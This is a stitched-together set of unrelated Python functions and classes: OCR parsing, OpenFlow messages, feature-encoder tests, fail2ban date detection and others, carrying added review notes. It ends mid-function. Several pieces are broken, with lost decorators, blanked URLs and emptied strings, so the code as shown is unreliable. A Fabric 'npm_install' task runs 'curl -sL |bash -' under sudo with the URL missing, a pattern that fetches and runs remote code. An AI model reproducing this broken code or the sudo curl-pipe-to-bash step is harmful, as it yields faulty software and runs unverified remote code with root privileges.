        rel_dir, file_name = os.path.split(info.dest)
        ensure_dir(rel_dir)
        if file_name == '__init__.py':
            dir_has_init[rel_dir] = True
        shutil.copy2(info.src, os.path.join(inst_dir, info.dest))

    for rel_dir, has_init in dir_has_init.items():
        if has_init:
            continue
        # Touch an empty __init__.py so the directory is a package.
        with open(os.path.join(inst_dir, rel_dir, '__init__.py'), 'w'):
            pass
def generate_random_dict(depth=0, max_depth=3, max_keys=5, key_type=None):
    """Build a random nested dict wrapped in AttributeDict.recursive.

    Key type (str/int/float) is chosen once per call unless supplied; values
    come from `generate_random_value`, which may recurse. Beyond `max_depth`
    a plain empty dict is returned (note: NOT wrapped in AttributeDict).
    """
    if not key_type:
        key_type = random.choice(['str', 'int', 'float'])
    if depth > max_depth:
        return {}
    entries = {}
    for _ in range(random.randint(1, max_keys)):
        if key_type == 'str':
            new_key = ''.join(random.choices('abcdefghijklmnopqrstuvwxyz', k=5))
        elif key_type == 'int':
            new_key = random.randint(0, 100)
        elif key_type == 'float':
            new_key = round(random.uniform(0, 100), 2)
        # Value is generated after the key so the RNG call order is stable.
        entries[new_key] = generate_random_value(depth, max_depth, key_type)
    return AttributeDict.recursive(entries)
def daly_command_message(command: int, extra=''):
    """Build a Daly BMS request frame: a5 <addr> 0<cmd> 08 <payload> <crc>.

    The hex string is zero-padded to 24 nibbles (12 bytes) before the CRC
    byte is appended.
    """
    assert isinstance(command, int)
    address = 8  # host/master address nibble
    frame_hex = ('a5%i0%02x08%s' % (address, command, extra)).ljust(24, '0')
    frame = bytearray.fromhex(frame_hex)
    frame.append(calc_crc(frame))
    return frame
def npm_install():
    """Install node/npm (if missing) plus browserify and eslint on the remote host.

    NOTE(review): the curl URL in the install command is truncated in this
    copy (presumably the nodesource setup script); restore before use.
    """
    # `run` echoes '1' only when npm is already on PATH.
    installed = run('if [[ -n $(which npm) ]]; then echo 1; fi')
    if (not installed):
        sudo('curl -sL |bash - && apt-get install -y nodejs binutils libproj-dev gdal-bin libgeoip1 libgeos-c1;', user=env.local_user)
    sudo('npm install -g browserify && npm install -g eslint', user=env.local_user)
class FileInfo(MFileDialogModel):
    """File-dialog extension showing size and access/modify/create times.

    NOTE(review): the bare `_property` lines below are mangled decorators --
    presumably `@cached_property` (Traits naming pairs `_get_size` with the
    `size` Property); confirm against the original traitsui demo source.
    """
    size = Property(observe='file_name')
    atime = Property(observe='file_name')
    mtime = Property(observe='file_name')
    ctime = Property(observe='file_name')
    view = View(VGroup(Item('size', label='File size', style='readonly'), Item('atime', label='Last access', style='readonly'), Item('mtime', label='Last modified', style='readonly'), Item('ctime', label='Created at', style='readonly'), label='File Information', show_border=True))
    _property
    def _get_size(self):
        # Empty string when the file cannot be stat'ed.
        try:
            return (commatize(getsize(self.file_name)) + ' bytes')
        except:
            return ''
    _property
    def _get_atime(self):
        try:
            return strftime('%m/%d/%Y %I:%M:%S %p', localtime(getatime(self.file_name)))
        except:
            return ''
    _property
    def _get_mtime(self):
        try:
            return strftime('%m/%d/%Y %I:%M:%S %p', localtime(getmtime(self.file_name)))
        except:
            return ''
    _property
    def _get_ctime(self):
        try:
            return strftime('%m/%d/%Y %I:%M:%S %p', localtime(getctime(self.file_name)))
        except:
            return ''
class OptionSeriesColumnrangeStates(Options):
    """Accessors for the columnrange series ``states`` option group.

    NOTE(review): sibling generated classes in this file use
    ``@property``-decorated accessors; the decorators may have been lost
    from this copy — confirm against the generator output.
    """

    def hover(self) -> 'OptionSeriesColumnrangeStatesHover':
        """Sub-options applied while a point is hovered."""
        return self._config_sub_data('hover', OptionSeriesColumnrangeStatesHover)

    def inactive(self) -> 'OptionSeriesColumnrangeStatesInactive':
        """Sub-options applied to points not currently highlighted."""
        return self._config_sub_data('inactive', OptionSeriesColumnrangeStatesInactive)

    def normal(self) -> 'OptionSeriesColumnrangeStatesNormal':
        """Sub-options for the default (normal) state."""
        return self._config_sub_data('normal', OptionSeriesColumnrangeStatesNormal)

    def select(self) -> 'OptionSeriesColumnrangeStatesSelect':
        """Sub-options applied to selected points."""
        return self._config_sub_data('select', OptionSeriesColumnrangeStatesSelect)
def test_encoding_when_nan_in_fit_df(df_enc):
    """CountFrequencyEncoder with missing_values='ignore' must fit on a frame
    that contains NaN rows and propagate NaN through transform.

    Fix: the original fitted on the pristine fixture ``df_enc`` and left the
    NaN-augmented copy ``df`` unused, so the scenario in the test's name was
    never exercised.
    """
    df = df_enc.copy()
    df.loc[len(df)] = [nan, nan, nan]
    encoder = CountFrequencyEncoder(encoding_method='frequency', missing_values='ignore')
    # fit on the frame that actually contains NaN (was: encoder.fit(df_enc))
    encoder.fit(df)
    X = encoder.transform(pd.DataFrame({'var_A': ['A', nan], 'var_B': ['A', nan], 'target': [1, 0]}))
    # frequencies are computed over non-NaN values, so 'A' keeps 0.3 / 0.5
    pd.testing.assert_frame_equal(X, pd.DataFrame({'var_A': [0.3, nan], 'var_B': [0.5, nan], 'target': [1, 0]}))
def AREA(cl: Any) -> MigrateInstruction:
    """Map a card list (or its string alias) to a migration-area instruction.

    CardList inputs resolve by their type/owner; the strings 'dropped' and
    'hand' map to the corresponding fixed areas.  Anything else is a
    programming error.
    """
    if isinstance(cl, CardList):
        if cl.type == 'deckcard':
            return DECKAREA
        if cl.type == 'droppedcard':
            return DROPAREA
        if cl.owner is None:
            # ownerless lists live in the deck area
            return DECKAREA
        # owned list: address the owner's player-id area
        return (MigrateInstructionType.AREA, (cl.owner.player.pid,))
    if cl == 'dropped':
        return DROPAREA
    if cl == 'hand':
        return HANDAREA
    raise Exception('WTF')
def test_encoding_when_nan_in_fit_df(df_enc):
    """MeanEncoder with missing_values='ignore' fits despite NaN rows and
    keeps NaN in the transformed output."""
    df = df_enc.copy()
    df.loc[len(df)] = [nan, nan, 0]
    encoder = MeanEncoder(missing_values='ignore')
    encoder.fit(df[['var_A', 'var_B']], df['target'])
    transformed = encoder.transform(pd.DataFrame({'var_A': ['A', nan], 'var_B': ['A', nan]}))
    expected = pd.DataFrame({'var_A': [0.0, nan], 'var_B': [0.2, nan]})
    pd.testing.assert_frame_equal(transformed, expected)
def extractWalkingTheStorm(item):
    """Parse a feed item's title into a release message, or None for
    previews / untitled chapters.

    NOTE(review): the emitted series name 'Joy of life' does not match the
    function name — looks like a copy-paste from a sibling extractor;
    confirm which series is intended.
    """
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if 'preview' in item['title'].lower():
        return None
    if not (chp or vol):
        return None
    return buildReleaseMessageWithType(item, 'Joy of life', vol, chp, frag=frag, postfix=postfix)
def test_has_changes_even_if_storage_root_returns_to_old_value(account_db):
    """Even when the storage root flips back to a previously-persisted value,
    the store must still report a changed root."""
    account_db.set_storage(ADDRESS, 1, 2)
    account_db.make_state_root()
    store = account_db._get_address_store(ADDRESS)
    assert store.has_changed_root
    original_root = store.get_changed_root()
    account_db.persist()
    assert not store.has_changed_root

    # first change away from the persisted value
    account_db.set_storage(ADDRESS, 1, 3)
    account_db.lock_changes()
    account_db.make_state_root()
    store = account_db._get_address_store(ADDRESS)
    assert store.has_changed_root
    assert store.get_changed_root() != original_root

    # now change *back* to the original value — still counts as a change
    account_db.set_storage(ADDRESS, 1, 2)
    account_db.lock_changes()
    account_db.make_state_root()
    store = account_db._get_address_store(ADDRESS)
    assert store.has_changed_root
    assert store.get_changed_root() == original_root
class DataleonApi(ProviderInterface, OcrInterface):
    """Dataleon OCR provider: invoice, receipt and financial-document parsing.

    Fixes: the endpoint URL string literals were unterminated in this copy of
    the source (syntax error) — closed with empty placeholders below;
    ``_normalize_invoice_result`` is now an explicit ``@staticmethod`` (it
    takes no ``self`` and is called through the class); redundant
    ``file_.close()`` calls inside ``with`` blocks removed.
    """

    provider_name = 'dataleon'

    def __init__(self, api_keys: Optional[Dict[str, Any]] = None) -> None:
        self.api_settings = load_provider(ProviderDataEnum.KEY, self.provider_name, api_keys=api_keys)
        self.api_key = self.api_settings['key']
        # TODO(review): real Dataleon inference endpoint URLs were lost from
        # this copy of the source — restore them here.
        self.url_invoice = ''
        self.url_receipt = ''
        self.headers = {'Api-Key': self.api_key}

    @staticmethod
    def _normalize_invoice_result(original_result: Dict[str, Any]) -> Dict[str, Any]:
        """Flatten the Dataleon entity list into one normalized invoice dict,
        grouping customer/merchant fields into sub-dicts and skipping logos."""
        fields = {'ID': 'invoice_number', 'CustomerName': 'customer_name', 'IssueDate': 'date', 'Subtotal': 'subtotal', 'Tax': 'taxes', 'Total': 'invoice_total', 'DueDate': 'due_date', 'VendorAddress': 'merchant_address', 'VendorName': 'merchant_name', 'TVANumber': 'TVA_number', 'SIREN': 'siren', 'SIRET': 'siret', 'CustomerAddress': 'customer_address'}
        normalized_response: Dict[str, Any] = {'customer_information': {}, 'merchant_information': {}}
        entities = original_result['entities']
        for idx in range(0, original_result['metadata']['documents'][0]['pages']):
            for entity in entities:
                # entities carry a 1-based page number
                if entity['page'] != (idx + 1):
                    continue
                field_name = fields.get(entity.get('name', None), entity['name'].lower())
                if field_name == 'logo':
                    continue
                field_value = entity.get('text', None)
                if field_name in ['customer_name', 'customer_address']:
                    normalized_response['customer_information'][field_name] = field_value
                elif field_name in ['merchant_address', 'merchant_name', 'siret', 'siren']:
                    normalized_response['merchant_information'][field_name] = field_value
                else:
                    normalized_response[field_name] = field_value
        return normalized_response

    def ocr__invoice_parser(self, file: str, language: str, file_url: str = '') -> ResponseType[InvoiceParserDataClass]:
        """Parse an invoice document through the Dataleon invoice endpoint.

        Raises ProviderException on any non-200 HTTP response.
        """
        with open(file, 'rb') as file_:
            response = requests.post(url=self.url_invoice, headers=self.headers, files={'file': file_})
        if response.status_code != 200:
            raise ProviderException(response.text, code=response.status_code)
        original_response = response.json()
        normalized_response = DataleonApi._normalize_invoice_result(original_response)
        invoice_parser = []
        taxes: List[TaxesInvoice] = [TaxesInvoice(value=convert_string_to_number(normalized_response.get('taxes'), float), rate=None)]
        invoice_parser.append(InfosInvoiceParserDataClass(
            merchant_information=MerchantInformationInvoice(
                merchant_name=normalized_response['merchant_information'].get('merchant_name'),
                merchant_siret=normalized_response['merchant_information'].get('siret'),
                merchant_siren=normalized_response['merchant_information'].get('siren'),
                merchant_address=normalized_response['merchant_information'].get('merchant_address'),
                merchant_email=None, merchant_phone=None, merchant_website=None,
                merchant_fax=None, merchant_tax_id=None, abn_number=None,
                gst_number=None, pan_number=None, vat_number=None),
            customer_information=CustomerInformationInvoice(
                customer_name=normalized_response['customer_information'].get('customer_name'),
                customer_address=None, customer_email=None, customer_billing_address=None,
                customer_id=None, customer_mailing_address=None,
                customer_remittance_address=None, customer_service_address=None,
                customer_shipping_address=None, customer_tax_id=None,
                abn_number=None, gst_number=None, pan_number=None, vat_number=None),
            invoice_number=normalized_response.get('invoice_number'),
            invoice_total=convert_string_to_number(normalized_response.get('invoice_total'), float),
            invoice_subtotal=convert_string_to_number(normalized_response.get('subtotal'), float),
            date=normalized_response.get('date'),
            due_date=normalized_response.get('due_date'),
            taxes=taxes,
            locale=LocaleInvoice(currency=normalized_response.get('currency'), language=None),
            gratuity=None, amount_due=None, previous_unpaid_balance=None,
            discount=None, service_charge=None, payment_term=None,
            po_number=None, purchase_order=None, service_date=None,
            service_due_date=None, bank_informations=BankInvoice.default()))
        result: ResponseType[InvoiceParserDataClass] = ResponseType[InvoiceParserDataClass](original_response=original_response, standardized_response=InvoiceParserDataClass(extracted_data=invoice_parser))
        return result

    def ocr__receipt_parser(self, file: str, language: str, file_url: str = '') -> ResponseType[ReceiptParserDataClass]:
        """Parse a receipt document through the Dataleon receipt endpoint.

        Raises ProviderException on any non-200 HTTP response.
        """
        with open(file, 'rb') as file_:
            response = requests.post(url=self.url_receipt, headers=self.headers, files={'file': file_})
        if response.status_code != 200:
            raise ProviderException(response.text, code=response.status_code)
        original_response = response.json()
        normalized_response = DataleonApi._normalize_invoice_result(original_response)
        taxes: Sequence[Taxes] = [Taxes(taxes=convert_string_to_number(normalized_response.get('taxes'), float), rate=None)]
        ocr_receipt = InfosReceiptParserDataClass(
            invoice_number=normalized_response.get('invoice_number'),
            invoice_total=convert_string_to_number(normalized_response.get('invoice_total'), float),
            invoice_subtotal=convert_string_to_number(normalized_response.get('subtotal'), float),
            date=normalized_response.get('date'),
            due_date=normalized_response.get('due_date'),
            customer_information=CustomerInformation(customer_name=normalized_response['customer_information'].get('customer_name')),
            merchant_information=MerchantInformation(
                merchant_name=normalized_response['merchant_information'].get('merchant_name'),
                merchant_siret=normalized_response['merchant_information'].get('siret'),
                merchant_siren=normalized_response['merchant_information'].get('siren'),
                merchant_address=normalized_response['merchant_information'].get('merchant_address')),
            taxes=taxes,
            locale=Locale(currency=normalized_response.get('currency')))
        result = ResponseType[ReceiptParserDataClass](original_response=original_response, standardized_response=ReceiptParserDataClass(extracted_data=[ocr_receipt]))
        return result

    def ocr__financial_parser(self, file: str, language: str, document_type: str, file_url: str = '') -> ResponseType[FinancialParserDataClass]:
        """Parse an invoice or receipt through the matching endpoint and map
        the raw response with ``dataleon_financial_parser``.

        Raises ProviderException on any non-200 HTTP response.
        """
        if document_type == FinancialParserType.RECEIPT.value:
            url = self.url_receipt
        else:
            url = self.url_invoice
        with open(file, 'rb') as file_:
            response = requests.post(url=url, headers=self.headers, files={'file': file_}, data={'table': 'true'})
        if response.status_code != 200:
            raise ProviderException(response.text, code=response.status_code)
        original_response = response.json()
        standardized_response = dataleon_financial_parser(original_response)
        return ResponseType[FinancialParserDataClass](original_response=original_response, standardized_response=standardized_response)
def bulk_run_local_args__setstate__(self, state):
    """Restore pickled state, backfilling defaults for fields that were
    added after the pickle was created (the incoming dict is mutated and
    then bound as the instance ``__dict__``)."""
    defaults = {
        'device_to_commands': None,
        'timeout': 300,
        'open_timeout': 30,
        'client_ip': '',
        'client_port': '',
        'uuid': '',
    }
    for attr, fallback in defaults.items():
        state.setdefault(attr, fallback)
    self.__dict__ = state
def wrapper(data, *args, **kwargs):
    """Wrap a pandas container in the matching project wrapper class.

    Returns None when *data* is not a DatetimeIndex, DataFrame or Series.
    pandas is imported lazily so the module loads without it.
    """
    import pandas as pd
    result = None
    if isinstance(data, pd.DatetimeIndex):
        result = DatetimeIndexWrapper(data, *args, **kwargs)
    elif isinstance(data, pd.DataFrame):
        result = PandasFrameWrapper(data, *args, **kwargs)
    elif isinstance(data, pd.Series):
        result = PandasSeriesWrapper(data, *args, **kwargs)
    return result
def read_jobname(config_file):
    """Load an ERT config, build a run context for all realizations and
    return the job name of the first realization."""
    ert_config = ErtConfig.from_file(config_file)
    num_realizations = ert_config.model_config.num_realizations
    with open_storage(ert_config.ens_path, mode='w') as storage:
        prior = storage.create_experiment().create_ensemble(
            name='prior',
            ensemble_size=num_realizations,
        )
        run_context = ensemble_context(
            prior,
            [True] * num_realizations,
            0,
            substitution_list=ert_config.substitution_list,
            jobname_format=ert_config.model_config.jobname_format_string,
            runpath_format=ert_config.model_config.runpath_format_string,
            runpath_file='name',
        )
        create_run_path(run_context, ert_config.substitution_list, ert_config)
        return run_context[0].job_name
# NOTE(review): `_meta(...)` below reads like a mangled decorator application
# (presumably `@..._meta(characters.rinnosuke.Netoru)` registering this UI
# metadata class for the Netoru skill) -- confirm against the original source.
_meta(characters.rinnosuke.Netoru)
class Netoru():
    # UI metadata for the Netoru skill.  The display strings appear to have
    # been stripped of their original (non-ASCII) text in this copy.
    name = ''
    description = ',,1'
    def clickable(self):
        """Skill button is clickable only during our own action stage and at
        most once per turn (tracked via the 'netoru_tag' tag)."""
        g = self.game
        me = self.me
        try:
            # already used this turn?
            if (me.tags['netoru_tag'] >= me.tags['turn_count']):
                return False
            # only clickable while the top of the action stack is our stage
            act = g.action_stack[(- 1)]
            if isinstance(act, actions.ActionStage):
                return True
        except IndexError:
            # empty action stack: nothing in progress
            pass
        return False
    def is_action_valid(self, sk, tl):
        """Validate the selection: exactly two cards from our hand or shown
        cards, and exactly one target who is missing life.

        Returns (ok, hint_text); the hint strings were stripped in this copy.
        """
        cl = sk.associated_cards
        me = self.me
        if ((not cl) or (len(cl) != 2)):
            return (False, '')
        elif any(((c.resides_in not in (me.cards, me.showncards)) for c in cl)):
            return (False, '!')
        if (len(tl) != 1):
            return (False, '')
        t = tl[0]
        if (t.life >= t.maxlife):
            # target already at full life: nothing to heal
            return (False, '...')
        else:
            return (True, '~')
    def effect_string(self, act):
        """Build the effect announcement text (original wording stripped;
        only the source/target character names remain)."""
        return f'{N.char(act.source)}{N.char(act.target)}'
def test_lp():
    # Exercises LaunchPlan.get_or_create caching and default-input handling.
    # NOTE(review): the nested defs read like flytekit @task / @workflow
    # definitions whose decorators were lost in this copy -- confirm against
    # the original test module.
    def t1(a: int) -> typing.NamedTuple('OutputsBC', t1_int_output=int, c=str):
        a = (a + 2)
        return (a, ('world-' + str(a)))
    def wf(a: int) -> (str, str):
        (x, y) = t1(a=a)
        (u, v) = t1(a=x)
        return (y, v)
    # same explicit name twice -> cached: the identical object is returned
    lp = launch_plan.LaunchPlan.get_or_create(wf, 'get_or_create1')
    lp2 = launch_plan.LaunchPlan.get_or_create(wf, 'get_or_create1')
    assert (lp.name == 'get_or_create1')
    assert (lp is lp2)
    # auto-named (default) launch plans are cached the same way
    default_lp = launch_plan.LaunchPlan.get_or_create(wf)
    default_lp2 = launch_plan.LaunchPlan.get_or_create(wf)
    assert (default_lp is default_lp2)
    # default inputs are only allowed together with an explicit name
    with pytest.raises(ValueError):
        launch_plan.LaunchPlan.get_or_create(wf, default_inputs={'a': 3})
    lp_with_defaults = launch_plan.LaunchPlan.create('get_or_create2', wf, default_inputs={'a': 3})
    assert (lp_with_defaults.parameters.parameters['a'].default.scalar.primitive.integer == 3)
def create_note(title: str, text: str, source: str, tags: str, nid: int, reminder: str, priority: int, author: str, url: Optional[str]=None, extract_start: Optional[int]=None, extract_end: Optional[int]=None) -> Optional[int]:
    """Insert a new user note and index it for search.

    Returns the new row id, or None when both *title* and *text* are empty
    (nothing is stored).  Also refreshes the priority queue when the note has
    a priority or reminder, and rewrites the backing markdown file for
    ``md:///...`` sources.

    Fixes: return annotation was ``int`` but the empty-input path returns
    None; local ``id`` renamed so it no longer shadows the builtin.
    """
    if (len(text) + len(title)) == 0:
        return None
    source = source.strip() if source is not None else source
    tags = '' if tags is None else tags
    # strip quote characters that would break search / SQL text handling
    tags = tags.replace('"', '').replace("'", '')
    # normalize to the ' tag1 tag2 ' space-delimited form used elsewhere
    tags = (' %s ' % tags.strip()) if len(tags.strip()) > 0 else tags
    conn = _get_connection()
    note_id = conn.execute('insert into notes (title, text, source, tags, nid, created, modified, reminder, lastscheduled, position, extract_start, extract_end, delay, author, priority, last_priority, url)\n values (?,?,?,?,?,datetime(\'now\', \'localtime\'),"",?,?, NULL, ?, ?, NULL, ?, ?, NULL, ?)', (title, text, source, tags, nid, reminder, _date_now_str(), extract_start, extract_end, author, priority, url)).lastrowid
    conn.commit()
    conn.close()
    if ((priority is not None) and (priority != 0)) or ((reminder is not None) and (reminder != '')):
        recalculate_priority_queue()
    index = get_index()
    if index is not None:
        index.add_user_note((note_id, title, text, source, tags, nid, ''))
    if (source is not None) and source.startswith('md:///') and source.endswith('.md'):
        # strip the 'md:///' scheme prefix (6 chars) to get the file path
        fpath = source[6:]
        update_markdown_file(fpath, text)
    return note_id
class Allow(ParentValidator):
    """Validator that bypasses its children when the input *is* (identity
    comparison) the allowed value; otherwise runs every child in sequence.

    On a child error the ORIGINAL input is returned with the error;
    otherwise the (possibly transformed) value is returned with no error.
    """

    def __init__(self, value, children, message=None):
        super().__init__(children, message=message)
        # allowed value, or a callable producing it lazily
        self.value = value

    def __call__(self, value):
        original = value
        allowed = self.value() if callable(self.value) else self.value
        if value is allowed:
            # exact identity match with the allowed value: skip validation
            return (value, None)
        for child in self.children:
            value, error = child(value)
            if error:
                return (original, error)
        return (value, None)
def run_demo_sdk():
    """Fetch a couple of online features through the feast SDK and print
    them sorted by feature name."""
    store = FeatureStore(repo_path='.')
    print('\n--- Online features with SDK ---')
    response = store.get_online_features(
        features=['driver_hourly_stats:conv_rate'],
        entity_rows=[{'driver_id': 1001}, {'driver_id': 1002}],
    )
    for key, value in sorted(response.to_dict().items()):
        print(key, ' : ', value)
class OptionSeriesAreasplinerangeSonificationTracksMappingTremoloDepth(Options):
    """Option group for the areasplinerange sonification tremolo-depth
    mapping (mapFunction / mapTo / max / min / within).

    Fix: the original defined each getter and setter as two plain methods
    with the SAME name, so the setter silently shadowed the getter — the
    ``@property`` / ``@x.setter`` decorators used by the sibling generated
    classes are restored below.
    """

    @property
    def mapFunction(self):
        return self._config_get(None)

    @mapFunction.setter
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    @property
    def mapTo(self):
        return self._config_get(None)

    @mapTo.setter
    def mapTo(self, text: str):
        self._config(text, js_type=False)

    @property
    def max(self):
        return self._config_get(None)

    @max.setter
    def max(self, num: float):
        self._config(num, js_type=False)

    @property
    def min(self):
        return self._config_get(None)

    @min.setter
    def min(self, num: float):
        self._config(num, js_type=False)

    @property
    def within(self):
        return self._config_get(None)

    @within.setter
    def within(self, value: Any):
        self._config(value, js_type=False)
class bsn_gentable_entry_stats_reply(bsn_stats_reply):
    """OpenFlow 1.3 BSN experimenter stats reply carrying gentable entry
    stats (loxigen-generated message class; Python-2 era byte handling is
    preserved as-is).

    Fix: ``unpack`` takes a reader, not ``self`` — restored the
    ``@staticmethod`` decorator that loxigen emits for it.
    """
    # wire-format constants for this message type
    version = 4
    type = 19
    stats_type = 65535
    experimenter = 6035143
    subtype = 3

    def __init__(self, xid=None, flags=None, entries=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if flags != None:
            self.flags = flags
        else:
            self.flags = 0
        if entries != None:
            self.entries = entries
        else:
            self.entries = []
        return

    def pack(self):
        """Serialize the message; the length field (bytes 2-3) is patched in
        after all parts have been collected."""
        packed = []
        packed.append(struct.pack('!B', self.version))
        packed.append(struct.pack('!B', self.type))
        packed.append(struct.pack('!H', 0))  # length placeholder
        packed.append(struct.pack('!L', self.xid))
        packed.append(struct.pack('!H', self.stats_type))
        packed.append(struct.pack('!H', self.flags))
        packed.append(('\x00' * 4))  # pad
        packed.append(struct.pack('!L', self.experimenter))
        packed.append(struct.pack('!L', self.subtype))
        packed.append(loxi.generic_util.pack_list(self.entries))
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack('!H', length)
        return ''.join(packed)

    @staticmethod
    def unpack(reader):
        """Deserialize a message from *reader*, asserting every fixed header
        field matches this class's constants."""
        obj = bsn_gentable_entry_stats_reply()
        _version = reader.read('!B')[0]
        assert (_version == 4)
        _type = reader.read('!B')[0]
        assert (_type == 19)
        _length = reader.read('!H')[0]
        orig_reader = reader
        # bound the reader to this message's declared length
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read('!L')[0]
        _stats_type = reader.read('!H')[0]
        assert (_stats_type == 65535)
        obj.flags = reader.read('!H')[0]
        reader.skip(4)  # pad
        _experimenter = reader.read('!L')[0]
        assert (_experimenter == 6035143)
        _subtype = reader.read('!L')[0]
        assert (_subtype == 3)
        obj.entries = loxi.generic_util.unpack_list(reader, ofp.common.bsn_gentable_entry_stats_entry.unpack)
        return obj

    def __eq__(self, other):
        if type(self) != type(other):
            return False
        if self.xid != other.xid:
            return False
        if self.flags != other.flags:
            return False
        if self.entries != other.entries:
            return False
        return True

    def pretty_print(self, q):
        """Render the message on pretty-printer *q*."""
        q.text('bsn_gentable_entry_stats_reply {')
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text('xid = ')
                if self.xid != None:
                    q.text(('%#x' % self.xid))
                else:
                    q.text('None')
                q.text(',')
                q.breakable()
                q.text('flags = ')
                value_name_map = {1: 'OFPSF_REPLY_MORE'}
                q.text(util.pretty_flags(self.flags, value_name_map.values()))
                q.text(',')
                q.breakable()
                q.text('entries = ')
                q.pp(self.entries)
            q.breakable()
        q.text('}')
class DateDetector(object):
    """Manages a set of date templates used to locate and parse the date
    portion of log lines.

    Remembers which template matched last (and at which position) so that
    subsequent lines of the same log are matched on a fast path, and reorders
    templates by usage to keep hot templates near the front.

    Fixes in this copy of the source: the ``0x7fffffff`` sentinel constants
    ("no match seen yet") in ``__init__`` and ``matchTime`` were missing, and
    the ``@property`` / ``@default_tz.setter`` decorators on ``templates`` /
    ``default_tz`` were mangled — both restored per the upstream
    implementation (see refs).
    """

    # cache of default templates, shared by all detector instances
    _defCache = DateDetectorCache()

    def __init__(self):
        self.__templates = list()
        self.__known_names = set()
        # time after which an unused template is considered stale (5 min):
        self.__unusedTime = 300
        # last known match distance (start offset) and preceding character:
        self.__lastPos = (1, None)
        # last known match end offset and following character; 0x7fffffff
        # means "no previous match":
        self.__lastEndPos = (0x7fffffff, None)
        # index of the template that matched last (0x7fffffff = none yet):
        self.__lastTemplIdx = 0x7fffffff
        # first position of a never-used template (reorder boundary):
        self.__firstUnused = 0
        # pre-match pattern (from {DATE} substitution):
        self.__preMatch = None
        # default time zone for lines without explicit zone info:
        self.__default_tz = None

    def _appendTemplate(self, template, ignoreDup=False):
        """Register *template*, rejecting duplicate names unless ignoreDup."""
        name = template.name
        if name in self.__known_names:
            if ignoreDup:
                return
            raise ValueError(('There is already a template with name %s' % name))
        self.__known_names.add(name)
        self.__templates.append(DateDetectorTemplate(template))

    def appendTemplate(self, template):
        """Add a template by instance or by pattern string.

        String patterns are resolved through the pattern cache and may be one
        of the special keys {^LN-BEG}, {DEFAULT}, {DATE} or {NONE}.
        """
        if isinstance(template, str):
            key = pattern = template
            if '%' not in pattern:
                # no strptime directives -> cache key is case-insensitive
                key = pattern.upper()
            template = DD_patternCache.get(key)
            if not template:
                if key in ('{^LN-BEG}', '{DEFAULT}'):
                    # special keys expand to (a filtered subset of) defaults
                    flt = (lambda template: ((template.flags & DateTemplate.LINE_BEGIN) if (key == '{^LN-BEG}') else None))
                    self.addDefaultTemplate(flt)
                    return
                elif '{DATE}' in key:
                    self.addDefaultTemplate(preMatch=pattern, allDefaults=False)
                    return
                elif key == '{NONE}':
                    # "no date" template: matches nothing
                    template = _getPatternTemplate('{UNB}^', key)
                else:
                    template = _getPatternTemplate(pattern, key)
                DD_patternCache.set(key, template)
        self._appendTemplate(template)
        logSys.info('  date pattern `%r`: `%s`', getattr(template, 'pattern', ''), template.name)
        logSys.debug('  date pattern regex for %r: %s', getattr(template, 'pattern', ''), template.regex)

    def addDefaultTemplate(self, filterTemplate=None, preMatch=None, allDefaults=True):
        """Append the (optionally filtered) default templates; duplicates are
        ignored when templates were already registered."""
        ignoreDup = (len(self.__templates) > 0)
        for template in (DateDetector._defCache.templates if allDefaults else DateDetector._defCache.defaultTemplates):
            if (filterTemplate is not None) and (not filterTemplate(template)):
                continue
            if preMatch is not None:
                # substitute the date placeholder inside the pre-match pattern
                template = _getAnchoredTemplate(template, wrap=(lambda s: RE_DATE_PREMATCH.sub((lambda m: DateTemplate.unboundPattern(s)), preMatch)))
            self._appendTemplate(template, ignoreDup=ignoreDup)

    @property
    def templates(self):
        """List of DateDetectorTemplate wrappers managed by this detector."""
        return self.__templates

    def matchTime(self, line):
        """Find a matching date template for *line*.

        Returns (match, template), or (None, None) when nothing matched.
        Tries the last successful template (at its last position) first, then
        falls back to a full search over all templates, reserving the best
        colliding candidate.
        """
        if not len(self.__templates):
            self.addDefaultTemplate()
        log = (logSys.log if (logSys.getEffectiveLevel() <= logLevel) else (lambda *args: None))
        log((logLevel - 1), 'try to match time for line: %.120s', line)
        match = None
        # reserved best candidate: (match, distance, endpos, template-index)
        found = (None, 0x7fffffff, 0x7fffffff, -1)
        ignoreBySearch = 0x7fffffff
        # fast path: try the template that matched last time
        i = self.__lastTemplIdx
        if i < len(self.__templates):
            ddtempl = self.__templates[i]
            template = ddtempl.template
            if template.flags & (DateTemplate.LINE_BEGIN | DateTemplate.LINE_END):
                log((logLevel - 1), '  try to match last anchored template #%02i ...', i)
                match = template.matchDate(line)
                ignoreBySearch = i
            else:
                (distance, endpos) = (self.__lastPos[0], self.__lastEndPos[0])
                log((logLevel - 1), '  try to match last template #%02i (from %r to %r): ...%r==%r %s %r==%r...', i, distance, endpos, line[(distance - 1):distance], self.__lastPos[1], line[distance:endpos], line[endpos:(endpos + 1)], self.__lastEndPos[2])
                # only search the same slice when its boundary chars agree
                # with the previous match (cheap collision bypass):
                if (((line[(distance - 1):distance] == self.__lastPos[1]) or ((line[distance:(distance + 1)] == self.__lastPos[2]) and (not self.__lastPos[2].isalnum()))) and ((line[endpos:(endpos + 1)] == self.__lastEndPos[2]) or ((line[(endpos - 1):endpos] == self.__lastEndPos[1]) and (not self.__lastEndPos[1].isalnum())))):
                    log((logLevel - 1), '  boundaries are correct, search in part %r', line[distance:endpos])
                    match = template.matchDate(line, distance, endpos)
                else:
                    log((logLevel - 1), '  boundaries show conflict, try whole search')
                    match = template.matchDate(line)
                    ignoreBySearch = i
            if match:
                distance = match.start()
                endpos = match.end()
                # if not a single template, or anchored, or the same position
                # as last time - accept; otherwise reserve and keep searching:
                if ((len(self.__templates) == 1) or (template.flags & (DateTemplate.LINE_BEGIN | DateTemplate.LINE_END)) or ((distance == self.__lastPos[0]) and (endpos == self.__lastEndPos[0]))):
                    log(logLevel, '  matched last time template #%02i', i)
                else:
                    log(logLevel, '  ** last pattern collision - pattern change, reserve & search ...')
                    found = (match, distance, endpos, i)
                    match = None
            else:
                log(logLevel, '  ** last pattern not found - pattern change, search ...')
        # slow path: search over all templates
        if not match:
            log(logLevel, ' search template (%i) ...', len(self.__templates))
            i = 0
            for ddtempl in self.__templates:
                if i == ignoreBySearch:
                    # already tried above
                    i += 1
                    continue
                log((logLevel - 1), '  try template #%02i: %s', i, ddtempl.name)
                template = ddtempl.template
